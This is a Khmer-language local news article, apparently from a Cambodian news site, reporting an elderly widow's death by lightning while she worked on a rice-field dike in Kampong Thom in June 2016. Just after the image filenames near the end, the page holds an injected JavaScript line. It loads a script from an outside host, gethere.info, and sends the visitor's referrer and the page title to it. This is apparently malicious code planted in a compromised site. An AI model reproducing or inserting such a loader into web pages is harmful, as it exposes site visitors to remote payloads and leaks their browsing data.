ព្រឹតិ្តការណ៍ថ្មីៗ

អនិច្ចា​ស្ត្រីចំណាស់ចេញទប់ភ្លឺស្រែត្រូវរន្ទះបាញ់ស្លាប់

1 ឆ្នាំ មុន 1 វិជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

 

ខេត្តកំពង់ធំ ៖ ស្រីវ័យចំណាស់ម្នាក់ ត្រូវរន្ទះបាញ់ស្លាប់ ខណះពេលកំពុងតែទប់ទំនប់ សំអាតភ្លឺស្រែនៅខាងក្រោយផ្ទះ កាលវេលាម៉ោង 5និង30នាទីល្ងាច ថ្ងៃទី06 ខែមិថុនា ឆ្នាំ2016 ស្ថិតនៅភូមិល្អក់ ឃុំកំពង់ថ្ម ស្រុកសន្ទុក ខេត្តកំពង់ធំ ។
កូនចៅនិងញាត្តិ ជិតខាង បានអោយដឹងថា មុនពេលកើតហេតុ ជនរងគ្រោះបានលីចប ទៅទប់ភ្លឺស្រែ នៅខាងក្រោយផ្ទះ ប្រមាណ50ម៉ែត្រ ប៉ុណ្ណោះ ហើយថា ពេលនោះមេឃស្រទុំបន្តិច ភ្លៀងមិនបានប៉ុន្មាន ដំណក់ផង ស្រាប់តែមានខ្យល់កន្ត្រាក់ រួមទាំងរន្ទះបាញ់ ចំលោកយាយ ដួលដាច់ខ្យល់ស្លាប់ ទៅហើយ ។
សពរងគ្រោះមានស្នាមរហែក សំពត់និងអាវ ព្រមស្នាមរបក ដើមចន្ទីទៀតផង ។ ស្ត្រីរងគ្រោះឈ្មោះ សៀ លាង អាយុ68ឆ្នាំ ជាស្ត្រីមេម៉ាយ មានទីលំនៅភូមិល្អក់ ឃុំកំពង់ថ្ម ស្រុកសន្ទុក ខេត្តកំពង់ធំ មានកូនចំនួន4នាក់ ស្រី3ប្រុស1 តែបច្ចុប្បន្នកូនៗ ទាំង4នាក់ មានប្តីប្រពន្ធ អស់ហើយ សព្វថ្ងៃគាត់ រស់នៅជាមួយកូនទី2 ហើយសពរងគ្រោះ កំពុងត្រូវបានកូនចៅ រៀបចំធ្វើបុណ្យ តាមប្រពៃណីយ៍ ៕

IMG-20160607-WA0080 IMG-20160607-WA0079s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ